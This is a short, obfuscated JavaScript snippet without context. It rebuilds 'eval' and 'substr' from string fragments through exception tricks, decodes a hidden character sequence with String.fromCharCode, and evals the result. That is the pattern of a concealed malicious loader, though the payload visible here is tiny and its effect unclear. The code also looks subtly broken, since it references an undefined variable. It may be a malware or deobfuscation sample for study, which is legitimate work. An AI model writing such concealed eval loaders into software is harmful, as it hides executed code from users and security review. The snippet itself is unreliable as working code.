opb = ''
v = 'su'
try {
  try {
    qwe()
  } catch (a) {
    gsdg()
  }
} catch (e) {
  v += 'bst'
  qqq = 'split'
}
qwe = ('webweb', v)[v + 'r']
t = 'lue'
b = 'v'
a = ['e', 'a', 'n', 'b', 'w', b, 'r']
e = (t, qwe)()[a[0] + b + a[1] + (a, t[0])]
e(
  'jp=favw' +
    ('', 'wb1')[a[6] + 'e' + 'p' + 'l' + 'a' + 'c' + 'e'](
      '1' == qq && '1' !== qq ? 1 : 2,
      'w.r'
    ) +
    'a' +
    'w' +
    'V' +
    'a' +
    t
)
s = jp.substr(t.length + 7, 3) + 'str'
q = jp[s](1, (1, t.length + 6))
di = e('String.fro' + q)
q = jp[s](14)[qqq]('u')
k = q.length
for (i = 0; i != k; i += 2) {
  il = parseInt(q[i + 1]) + parseInt(('erybjkerl', q[i]))
  opb += di(il)
}
e(opb)
